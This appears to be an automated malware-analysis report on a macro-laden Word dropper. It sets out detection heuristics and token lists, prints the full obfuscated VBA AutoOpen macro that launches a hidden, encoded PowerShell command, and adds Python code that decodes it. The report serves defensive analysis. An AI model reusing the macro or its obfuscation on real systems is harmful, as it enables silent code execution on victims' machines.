Verdict: MALICIOUS
Risk score: 310
Heuristics: 10
- ClamAV: Doc.Dropper.Valyria-6665595-0 | critical | CLAMAV_DETECTION
  ClamAV detected this file as malware: Doc.Dropper.Valyria-6665595-0
- VBA macros detected | medium | OLE_VBA_MACROS (4 related findings)
  Document contains VBA macro code
- WScript.Shell usage | critical | OLE_VBA_WSCRIPT
  Matched line in script: NtLmiKwO = CreateObject("WScript.Shell") _
- CreateObject call | high | OLE_VBA_CREATEOBJ
  Matched line in script: NtLmiKwO = CreateObject("WScript.Shell") _
- VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC
  Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
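As an added example (not the analyzer's own implementation), the pairing rule above written out in Python: sweep a raw stream for identifier-like ASCII runs and fire only when at least one token from each set is present. The byte blobs are constructed stand-ins for a compiled VBA stream, and the assumption that identifier names survive in a p-code or cache stream as plain printable runs is mine, not something the rule text states.

```python
import re

# Token sets copied from the rule description above (matched case-insensitively).
AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")

# Constructed stand-ins for a compiled VBA stream: length bytes and NULs around
# the identifier strings such a stream carries. Not bytes from the real sample.
PCODE_HIT = b"\x00\x01\x08AutoOpen\x00\x00\x0cCreateObject\x00\x0dWScript.Shell\x00\x03Run\x00"
PCODE_AUTO_ONLY = b"\x00\x01\x08AutoOpen\x00\x06MsgBox\x00\x05Hello\x00"
PCODE_EXEC_ONLY = b"\x00\x0cCreateObject\x00\x1aScripting.FileSystemObject\x00"


def ascii_runs(blob, min_len=4):
    """strings(1)-style sweep: printable-ASCII runs of at least min_len bytes.
    Assumption: identifier names survive in the p-code/cache stream this way."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def _present(tokens, text):
    """Tokens that occur in text as whole words, so 'Shell' fires on
    'WScript.Shell' but not inside an unrelated identifier such as 'Shelly'."""
    return [tok for tok in tokens
            if re.search(r"(?<![a-z0-9_])" + re.escape(tok.lower()) + r"(?![a-z0-9_])", text)]


def pcode_autoexec_exec(blob):
    """The OLE_VBA_PCODE_AUTOEXEC_EXEC rule: return (autoexec_hits, exec_hits)
    only when both lists are non-empty, otherwise None. Either set alone is
    not a detection, which is the point of the pairing."""
    text = " ".join(ascii_runs(blob)).lower()
    auto, execs = _present(AUTOEXEC_TOKENS, text), _present(EXEC_TOKENS, text)
    return (auto, execs) if auto and execs else None
```

On the stream mimicking this sample (AutoOpen next to CreateObject and WScript.Shell) the rule fires and names both halves of the pair; the two single-sided blobs come back None, matching the "neither token alone" behaviour described above.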
- AutoOpen macro | low | OLE_VBA_AUTOOPEN
  Matched line in script: Sub AutoOpen()
- Reference to Windows Script Host | high | SC_STR_WSCRIPT
  Reference to Windows Script Host
- Legacy WordBasic auto-exec macro marker | medium | OLE_LEGACY_WORDBASIC_AUTOEXEC
  OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this finding is at odds with the artifact section of this report: olevba did decode a VBA project (macros.bas), and its AutoOpen is the same entry point. Treat this hit as overlapping OLE_VBA_AUTOOPEN rather than as an independent legacy-macro surface; the two are one auto-exec indicator.
- Suspicious extracted artifact | medium | EXTRACTED_FILE_STATIC_TRIAGE
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL | info | EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace identifier found in practically every Office file that contains drawing objects; it is a schema name, not a host the sample contacts, and should not be promoted to a network indicator or blocklist entry.
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10584 bytes | 0eee9c760f8f49623ff34a60a6db5dfd8c7d617e0b6879626e1cf64fc24c4636 |

Detection (macros.bas):
- ClamAV: No threats found. This does not contradict the Doc.Dropper.Valyria-6665595-0 hit above: that signature matched the document itself, and the decoded VBA source is a different byte stream that the signature need not match.
- Obfuscation or payload: likely. 144 of 226 identifiers look randomly generated (e.g. 'znLKzJzoudlYA'); 3 string-concatenation chain(s), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script; the decoded module shown here is shorter than that, so it appears in full):
Attribute VB_Name = "znLKzJzoudlYA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ApWzUKnRosNSQ"
Function AAQTwY()
On Error Resume Next
Error TsBOk * PzbIr / EGIrlR * tBdawp
Error 80496 * XVtGNU / GJcGUz / ibFhc
Error cdirr / ApSFY * Jcsqw * cVpkE
Error mGlMo / iRXmB * KVjkTi / 41263
azsTMArRGVs = "Md /V^" + " " + "^ " + "^" + " /" + "c " + " " + Chr(0 + 2 + 1 + 4 + 27) + " ^se^t"
Error 86001 * uXftQL
Error 65237 / 51968 * vRDLS / MCftpY
Error YnNiX / fbfhw
Error 48347 * BOrfwL * 84365 / lCSPk
iPhLN = " ^ ^ ^" + " ^6^bv" + "=AACA^g" + "^A^A" + "IAAC^" + "A^gA^"
Error CnWmM * zdJdWH
Error 49727 * KwZVd
TqkZmJPM = "A^" + "I^A^AC^" + "A^g^AA" + "^I^" + "A^A" + "CA^" + "g^" + "A^" + "AI^A^A"
Error wAFiQf * BqYLln * 4118 * sPcUD
Error IXMki / hjHdFJ * 78225 * IFmzEB
TcNlBV = "CA^g^AA" + "^IA" + "ACA^gA^" + "Qf^A" + "0H^A7^B" + "AaA^M^" + "G^A0" + "^B^QY^" + "AMG" + "A" + "9^B^wOA"
Error AMbLf * UBoFn
Error DwGwti / hUhntR
Error 13147 * IrBXkJ
HKPspJlirRN = "s^" + "G^AhB" + "QZ^AIHA" + "^" + "i^Bw^OA" + "^M"
Error zMPHSO / VaqFs
Error qaVcff / SOavXR
Error 58038 * RhbBl
Error FvRXf * hTUOGX * TbTjj * 93335
jCjmN = "F^AuB" + "^g^" + "YA^" + "QC^A^" + "g^" + "A^Qb^" + "A^" + "UGA^0B^" + "Q" + "^S^A^0" + "C^" + "A" + "^lB"
Error nUPbIH / OZHWz
Error 13590 / 28029
Error YGvni * oMuwWP
Error jiHTJ / BwhfM
Error 40892 / zzWLc
lPzsiUdjqEQ = "^w" + "^aA^8" + "GA2^B^g" + "^bA" + "^" + "k" + "EA7A" + "^QKA" + "^" + "M"
Error zGbKQV / csXGZ
Error 87085 / PHUAFb * 4769 / ztAtM
Error 36167 / FKjnQf
Error dKDTwP / 87355 / MQRjw / 59626
Error 78720 / pYzJNh
bskdYj = "F^A" + "^uBg^YA" + "QCAg" + "A^AL" + "A0E^A" + "vB^Q" + "W^AQC" + "AoA^QZA" + "^w^GA^" + "p^B^"
Error QjXvXi / kzihv
Error lbRPcK * DvQAjj
LzahjSi = "g" + "R^A^Q" + "G^Ah^B" + "wbAwG^A" + "u^" + "B^wdA8" + "G^AEB" + "g^LAo^"
Error 60966 * 19933 * qOcFY / 41213
NYAswfQFLbJ = "G^A^U" + "^BQ^WA" + "QC^A^7^" + "BQ^" + "eAIHA" + "^" + "0Bw^eA" + "^kC" + "^AM" + "BgQ" + "^AM^E^A" + "^kA^A^I" + "A^4^"
AAQTwY = azsTMArRGVs + iPhLN + TqkZmJPM + TcNlBV + HKPspJlirRN + jCjmN + lPzsiUdjqEQ + bskdYj + LzahjSi + NYAswfQFLbJ
Error 24984 * rRluP * uPGhpV * csNWw
Error XlHpE * isSCK / BQOGk / kWWls
Error QBwsp * kiPMHJ
End Function
Function nkWaqCkJW()
On Error Resume Next
Error 30627 / 23549 * vltwpz / 58476
Error TRzrF / IwoQfR
Error jGXzl / QvpFK / pEFBwD * hUnNl
sDmuNHIlkD = "GA^p^B" + "^AI^A" + "0^E" + "AvBQW^A" + "QC^Ao" + "^AAaA" + "^M" + "G^A^h"
Error apOMFp / zjdbzE / 15638 * Llfiz
Error VGXvhi / GknLC * 26645 * YjnzhW
Error 78341 * SmtsmV * AVzDM / GrZhj
nzHbKrHiLqL = "^BQZ" + "^A^I" + "HAvBgZ^" + "A^s" + "^DAnA" + "QZ" + "AgHAl" + "B^gLAcC" + "^Ar^Ag^" + "W^" + "Ak^"
Error 46393 / IGjjo
KVZpGBEDc = "F^A" + "^i^B^" + "AJ^AsC" + "^A" + "n^" + "A"
Error 32301 * cdiRna * sRipjN * IQrdpb
Error 88762 / kTGMpt
Error pdUIoJ / FZatn / 72944 / utmEr
Error MOPBq * 49662
TAvChlzrOmB = "^AX" + "AcC^" + "ArAwY^" + "A^" + "kG" + "A^s" + "B" + "^g^YAU^" + "HAwB^gO" + "A^Y"
Error lWMNv * ihfzzh * KzhXd * wiSqU
Error 63377 * hILzF
sKhNblmb = "H" + "A^u^" + "BQZA^QC" + "A^9A" + "wU" + "A^4G" + "Ai" + "B" + "AJ^" + "A" + "s" + "^D^AnAA" + "N^AI^D^"
Error npbTj * FmUPwt
Error OlmmO / CDWXw / ZkTKb / oSwib
OiavjV = "A" + "^yAw" + "J^A" + "A" + "C^A9" + "A^AI" + "^Ao^F^A" + "^ZB^g^Y" + "^AQC" + "^" + "A7A^QKA" + "cC^" + "A"
Error Gvjiar * KjzOYY / 71240 * hJmkX
Error 90558 / mttInl / 41436 * cjiorr
Error MGcJb * tNOHO * TqZjJz / abakq
Error iEVXRQ * YGqFSM * 14861 / cMMSvl
XGiIIZ = "^A^B" + "^wJ" + "AgC" + "^A" + "^0^B^Q" + "aA^" + "wG^Aw^" + "Bw^U^A" + "4CAn^" + "AQM"
Error 70985 / UTpcZ
XUiaiIu = "^" + "Ac^H^" + "A0" + "^A^gMAo" + "^FA^" + "H^BgN^"
Error OOHBK / ZOtCDw
Error 39691 / UoqMM / 15239 / GicoWz
Error 84126 * AiEHRa
YKsCf = "A8C^AvB" + "g" + "b^A4CA^" + "z^B" + "wb^A" + "w^G^A" + "lBAaA4" + "CA0^Bw"
nkWaqCkJW = sDmuNHIlkD + nzHbKrHiLqL + KVZpGBEDc + TAvChlzrOmB + sKhNblmb + OiavjV + XGiIIZ + XUiaiIu + YKsCf
Error lkFrvz / NdKjvW / tWrsOF / 2650
Error ClsvGv * IrRjG
Error AlXNP / BDLNzi * zJikWz / vUrAWW
Error fpQoDw * 98003
Error zzYcj / EuOfw / AtwzDZ / uJvNjj
End Function
Function TGYwfRXiBE()
On Error Resume Next
Error 92496 / HhOKYW
Error 3840 / luArSm
Error 58475 / iHufa
BcCJa = "c^" + "AUGA" + "0BwL" + "^" + "A^8" + "C^A^" + "6A^" + "AcA^Q^H" + "^A"
Error 94287 / vKatG
Error 17260 / SnnRN * lWrwA / RWsrQQ
Error 51186 * suoLPD
Error 19923 / zWLXo / 33197 / wmcLS
ARANGbrCiE = "0" + "BA^a^A^" + "A^EA^1" + "^Bw^LA" + "^" + "8G^" + "Aj^B^" + "gL" + "^" + "A^0G" + "A" + "v^" + "Bw^Y"
Error 85374 / YJlct * QzwfNz / 37867
Error 76858 * AculvC * 13974 * sWcMY
SknmGwAZaX = "A4C" + "AuBw" + "bAk" + "G^" + "A^0^B"
Error STwjTc * mLGvjH
Error 15567 * cYqwod
Error 22503 / iKdjLc
Error 41828 / ZjWzD * 48960 * jFVqDz
AwIjbj = "w" + "YA^U^GA" + "^0^BwbA" + "I^H^A" + "^wB^wb^" + "A^kGA" + "2^Bw" + "^"
Error 61894 / cuwFzp / 74399 / zLbGcN
Error aMADYW * CoYEG * 31105 * sdPdw
Error ZJNlkG / 12477
Error jwjAIL / sOmkF
HvRKw = "LA" + "^8C^A6^" + "A^AcAQ" + "H^A" + "^" + "0"
Error RtrciW * 25040 / 46961 * lLkNM
Error Pzbtf / ufomz / EfjRn * rKFhv
jYHPjrPX = "B" + "A^a" + "^" + "A^A^EA0" + "^A^wZ" + "^Aw^E^A" + "vA^Q^b" + "^A^8^G" + "Aj" + "B^" + "gLA"
Error RIBZE / ESSBcP / 29444 / BcINQC
OZthQwavt = "Y" + "H^A^l^" + "BAZ^" + "A^gGA" + "z^" + "B^Qa^A4" + "^G^Av" + "^B"
Error 31256 * csuVha * mRAPnw * MLnKQ
Error 69825 / zCJHE / nqBMsR / MnilrJ
Error 96541 / 28716
HIMdrUv = "^A^d^A4" + "CA^" + "l" + "Bw" + "ZAEG" + "^" + "Aw" + "B^" + "Q" + "^" + "Z^A^0^" + "G^A" + "v^B^Aa"
Error 60768 * AFOsov * 99612 * vsMZW
Error 98497 / wDvfOA / EYYLu * ijubH
Error 66292 * IXwRdR
Error LVPqW * PTAiA
AqupuREt = "^A0C" + "A^4^B^Q" + "YA" + "Q" + "^HA"
Error QjFIM * RzOvQ
cRjNNBOVr = "6B^w" + "^bA^8" + "C^" + "Av^A^g" + "^O" + "^AAH^A" + "0B^A^d"
Error 62363 * 96432
Error idiMDw / nRUbb
Error 94648 * QoHNM / 40289 * mFOHT
FAGWO = "^A" + "^gG^AA" + "BA^T^As" + "G^AyAw^" + "YA^"
TGYwfRXiBE = BcCJa + ARANGbrCiE + SknmGwAZaX + AwIjbj + HvRKw + jYHPjrPX + OZthQwavt + HIMdrUv + AqupuREt + cRjNNBOVr + FAGWO
Error iVmzRD * 54111
End Function
Function CZwToYDn()
On Error Resume Next
Error 75329 * VvopW
Error PjBZkB / iqcwv / dRrlGp * 52389
Error 96081 * jtaKzJ
Error sRUKm * Jkkin
AjWifqfQiS = "I" + "^G^A0A^" + "w" + "^L" + "A"
Error 18551 * KXDED
Error OTRuUf * rPUsM
TWnopnuq = "UHAlBg" + "L" + "^A" + "MH^A^" + "y^B^Q^d" + "A^8^" + "GA^s^" + "B^wb^A" + "MG^Au" + "^B^Q"
Error 16055 / iRbWF
Error 83519 / pWcQmv
lJdHKZbNL = "^ZA^YH" + "^A^lB" + "wcA^4" + "C^Ak^B" + "^A^" + "bA^kG" + "A1B^gY" + "^AE"
Error 62754 / DBtsF
Error tSTUm * mBFZm * NbVcjF / CuETPz
Error aHZmMz * LaYPCT
Error 27268 / WSTTki
hXUQrwsksTw = "G" + "Ay^BQZA" + "QH" + "A" + "v^A"
Error 74118 * bfowD * GIMuf * 74580
Error QPuDQC * 57386
zlNOAfa = "^wLA" + "^oD" + "A^" + "wB^" + "A^d" + "^AQ^HA" + "^" + "oBA^Q^"
Error 44287 * 94885
Error MKsiLz / WRWbU
Error KdTBjs / CUnVwk / 57692 * 28144
Error 85966 / jYFTj
Error BHutw / MUmWH
NXFErTT = "AkH" + "^AvA" + "^Qb" + "A8" + "^" + "GA^j^B^" + "g^LAE^" + "G^A^2" + "^B" + "^Qa^A" + "Q" + "H^A^"
Error 26009 / nKpFM
Error aHSFa / zDMJG
Error 94259 / iCcUl
FQUXDrdZ = "yB" + "w^b^AAH" + "^A^l" + "^B" + "^" + "AZ^AE" + "G^Aw^" + "Bw"
Error 21010 * lwnDHj / 17576 / zFWvz
Error hEHNk * qlPcjI
Error 76265 * XaBGZG
Error qUDvG * aaiVob
IFuapz = "^b^A^" + "I" + "^H" + "^AuBwb^" + "AkGA^" + "o^Bwc^" + "A^EG^" + "A^" + "mB^Q^" + "Y" + "^A^" + "k^GA^t^"
Error EFfIXW * bvdYO
Error 72242 / JMsIL * AAPmn / HRhNou
Error XAfFOk * DizLqG
UsbwCTso = "B^wL^" + "A^8C^" + "A^6A" + "^A" + "cAQ" + "H^A0" + "^B" + "^A^a^A" + "c" + "CA9AAT" + "A^I^E^" + "A^" + "D"
CZwToYDn = AjWifqfQiS + TWnopnuq + lJdHKZbNL + hXUQrwsksTw + zlNOAfa + NXFErTT + FQUXDrdZ + IFuapz + UsbwCTso
Error WANvA / jwjPjq / 43879 * MVcUB
End Function
Function ZAZFaKiQqLI()
On Error Resume Next
Error 80663 / 52489 / 92614 * wNRwBM
Error UijZR / DOPwf
Error PmLfN / vUDiX * 13554 * kwVrM
JFSLiBTWW = "BA^JA" + "s" + "DA^0" + "Bgb^A^U" + "G"
Error HhBqP / FjbHD / lMQvGp * AwkGmN
pVUjzo = "^A" + "pBA^b" + "^" + "A^MEA^" + "iB" + "^Q" + "Z^" + "Ac^F" + "Au^A" + "A^d" + "^A" + "^UGA"
Error 64274 / 9052
mCikrYI = "O^BAIA^" + "Q" + "^HA" + "^" + "jB^Q^Z^" + "AoGA" + "iB^w" + "bA0" + "C^A^3^" + "B^Q^"
Error 38954 * cdPUAw
Error 8101 / iBbGs / 43240 * HhhQlj
Error oDZVc / rzTrp * VdWaO * KBYbVD
TswpwBjJ = "Z^A" + "^4^GA9A" + "^" + "g^aA^Q" + "^F" + "AZ^B^A^" + "J^ ^e^" + "-" + " ^l^l^" + "e" + "^hs"
Error NNDPzG * FXmOjN / 65262 * lYMIw
Error wuYVpt * saloqH / 80473 * oJcNWi
DQTzsvVbI = "rew^o" + "^p& " + " ^f^O" + "r /^L " + "%^w ^i" + "n ( " + "^1" + "^013^ ^" + " ^ -^1" + "^" + " ^ ^ " + "0)^D"
ZAZFaKiQqLI = JFSLiBTWW + pVUjzo + mCikrYI + TswpwBjJ + DQTzsvVbI
Error uzMfN / HntcQ / qiRuH / McrXaf
End Function
Function UkMWDn()
On Error Resume Next
Error jjVCq * IaphSf / dBwfY * ziKSO
kfRnUt = "^O s" + "^e^t ^m" + "^bS=!^" + "m^bS!!^" + "6^bv:~ " + " %^w" + ", 1!" + "&" + "^I^f" + " " + "%^w =="
Error YXZjZd / bDXZa
Error auGjlZ * 41408
Error 66380 / bNoAJ
TfpJmjlLn = " " + "^" + "0 C^" + "A^l" + "L" + " %" + "^m^bS" + ":^*" + "^mbS^" + "!^"
Error iziZpr / FmQaiR * AKNvwZ * tBpIlW
Error wFjDQA * BjCzYF / 96990 / PajEZD
Error NhwLYA * maDJp
Error IiUjQ * 50180 * qiELl * vpREVv
JiKzIjTtOE = "=" + "% " + " " + Chr(0 + 2 + 1 + 4 + 27) + " "
UkMWDn = kfRnUt + TfpJmjlLn + JiKzIjTtOE
Error iTtwuY * rpjzit * oEGYN * 43002
End Function
Attribute VB_Name = "YBEISfwZXXh"
Sub AutoOpen()
On Error Resume Next
Error rONqm * CJQtzO
Error 48152 * NBlXc
Error 21614 * wbHaSs * DfiWX / wlfjDM
NtLmiKwO = CreateObject("WScript.Shell") _
. _
Run _
(ChrW(12 + 4 + 7 + 5 + 39) + OhrOYobRKQ + NukjzBt + AAQTwY + nkWaqCkJW + TGYwfRXiBE + CZwToYDn + ZAZFaKiQqLI + UkMWDn + XINXMRiRpSFu + IvhiVpbowuUMTR, 462569852 - 462569852)
Error ZJiKS * zwNLP * 82992 / 82141
Error 50357 * OhnqYd / LWwAUw * KXvbkQ
End Sub
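What AutoOpen above actually computes, as an added example in Python (not code from the sample or from the analyzer): every `Error x * y` line raises a run-time error that `On Error Resume Next` swallows, so they are junk; the string functions build one `cmd` line out of caret-laced fragments, with `Chr(0 + 2 + 1 + 4 + 27)` supplying the double quote and `ChrW(12 + 4 + 7 + 5 + 39)` the leading `C` of `CMd`; names such as OhrOYobRKQ and XINXMRiRpSFu are never assigned, so they concatenate as empty strings; and the batch body sets a variable to a back-to-front buffer, rebuilds it with a `for /L` loop counting down from 1013 to 0, then `call`s the result. The code below evaluates the VBA concatenations, strips cmd's caret escapes, isolates the `/c` body and replays the countdown loop. The embedded VBA is a constructed sample that mirrors the macro's structure with a short reversed payload in place of the real one; the `set`/`for /L`/`call` regexes assume the exact shape seen above and would need adjusting for other variants.

```python
import re

# Constructed VBA sample: same fragment-and-caret style as the macro above, but
# with a short reversed payload ("echo hello world") so the result can be
# checked by hand. Not the sample's actual code.
VBA_SAMPLE = r'''Attribute VB_Name = "ApWzUKnRosNSQ"
Function AAQTwY()
On Error Resume Next
Error TsBOk * PzbIr / EGIrlR * tBdawp
azsTMArRGVs = "Md /V^" + " " + "^ " + "^" + " /" + "c " + " " + Chr(0 + 2 + 1 + 4 + 27) + " ^se^t"
Error 86001 * uXftQL
iPhLN = " ^6^bv" + "=dlr^ow" + " ^ol^leh" + " ^oh^ce" + "&^f^O" + "r /^L "
AAQTwY = azsTMArRGVs + iPhLN
End Function
Function UkMWDn()
On Error Resume Next
kfRnUt = "%^w ^i" + "n (^1^5 -^1 0)^D" + "^O s" + "^e^t ^m" + "^bS=!^" + "m^bS!!^" + "6^bv:~" + "%^w, 1!" + "&^I^f" + " %^w =="
TfpJmjlLn = " " + "^" + "0 C^" + "A^l" + "L" + " %" + "^m^bS" + ":^*" + "^mbS^" + "!^"
JiKzIjTtOE = "=" + "% " + " " + Chr(0 + 2 + 1 + 4 + 27) + " "
UkMWDn = kfRnUt + TfpJmjlLn + JiKzIjTtOE
End Function
Sub AutoOpen()
On Error Resume Next
NtLmiKwO = CreateObject("WScript.Shell") _
. _
Run _
(ChrW(12 + 4 + 7 + 5 + 39) + OhrOYobRKQ + AAQTwY + UkMWDn, 462569852 - 462569852)
End Sub
'''

# One string literal, one Chr()/ChrW() call, or one identifier.
_PART = re.compile(r'"([^"]*)"|(Chr[W]?)\(([^)]*)\)|([A-Za-z_]\w*)')
_ASSIGN = re.compile(r"^\s*(\w+)\s*=\s*(.+)$")
_RUN_ARG = re.compile(r"\.\s*Run\s*\((.*?),\s*\d+\s*-\s*\d+\s*\)", re.S)


def _arith(expr):
    """The '+'/'-' integer arithmetic the macro hides character codes behind."""
    return sum(int(t) for t in expr.replace(" ", "").replace("-", "+-").split("+") if t)


def eval_concat(expr, env):
    """Join literals, Chr()/ChrW() values and variables. Names that were never
    assigned are Empty in VBA and concatenate as "", which the macro relies on."""
    out = []
    for lit, fn, arg, ident in _PART.findall(expr):
        if fn:
            out.append(chr(_arith(arg)))
        elif ident:
            out.append(env.get(ident, ""))
        else:
            out.append(lit)
    return "".join(out)


def strip_carets(s):
    """cmd's escape rule: a caret is dropped and the next character kept."""
    return re.sub(r"\^(.)", r"\1", s, flags=re.S)


def decode_run_command(vba_src):
    """Rebuild the string handed to WScript.Shell.Run, then de-caret it. Carets
    inside double quotes are literal to cmd, but the only quotes here are the
    outer pair around the /c body, which cmd /c strips before re-parsing, so
    every caret in this payload is removed exactly once."""
    src = re.sub(r"[ \t]_[ \t]*\r?\n\s*", " ", vba_src)  # join ' _' continuation lines
    env = {}
    for line in src.splitlines():
        m = _ASSIGN.match(line)
        if m:
            env[m.group(1)] = eval_concat(m.group(2), env)
    run = _RUN_ARG.search(src)
    if run is None:
        raise ValueError("no WScript.Shell.Run(...) call found")
    return strip_carets(eval_concat(run.group(1), env))


def inner_command(cmdline):
    """The body that cmd /c executes, with the outer quotes removed."""
    body = re.split(r"\s/c\s", cmdline, maxsplit=1, flags=re.I)[1].strip()
    if body.startswith('"') and body.endswith('"'):
        body = body[1:-1]
    return body.strip()


_SET = re.compile(r"\bset\s+(\w+)=([^&]*)&", re.I)
_FOR = re.compile(r"\bfor\s+/L\s+%(\w)\s+in\s+\(\s*(\d+)\s+-1\s+0\s*\)\s*do\s+"
                  r"set\s+(\w+)=!\3!!(\w+):~\s*%\1\s*,\s*1!", re.I)
_CALL = re.compile(r"\bcall\s+%(\w+):\*(\w+)!=%", re.I)


def emulate_reversal(inner):
    """Replay: set buf=<reversed payload>& for /L %w in (N -1 0) do set acc=!acc!!buf:~%w,1!&
    if %w == 0 call %acc:*acc!=%   -> acc is buf read from index N down to 0.
    %var:*needle=% drops everything through the first needle; the needle never
    occurs in the value, so that step is a no-op that only confuses parsers."""
    env = {}
    m = _SET.search(inner)
    env[m.group(1)] = m.group(2)
    f = _FOR.search(inner)
    n, acc, buf = int(f.group(2)), f.group(3), f.group(4)
    env[acc] = "".join(env[buf][i] for i in range(n, -1, -1))
    c = _CALL.search(inner)
    value, needle = env[c.group(1)], c.group(2) + "!"
    if needle in value:
        value = value[value.index(needle) + len(needle):]
    return value.strip()
```

The same three steps apply to the real macros.bas: the visible fragments already show the end of the buffer reads `...AZBAJ e- llehsrewop`, which is `powershell -e JABZA...` backwards, so the countdown loop reassembles a PowerShell `-e` (encoded command) invocation. The Run call's second argument, `462569852 - 462569852`, is 0, the window style that tells WScript.Shell.Run to keep the console hidden.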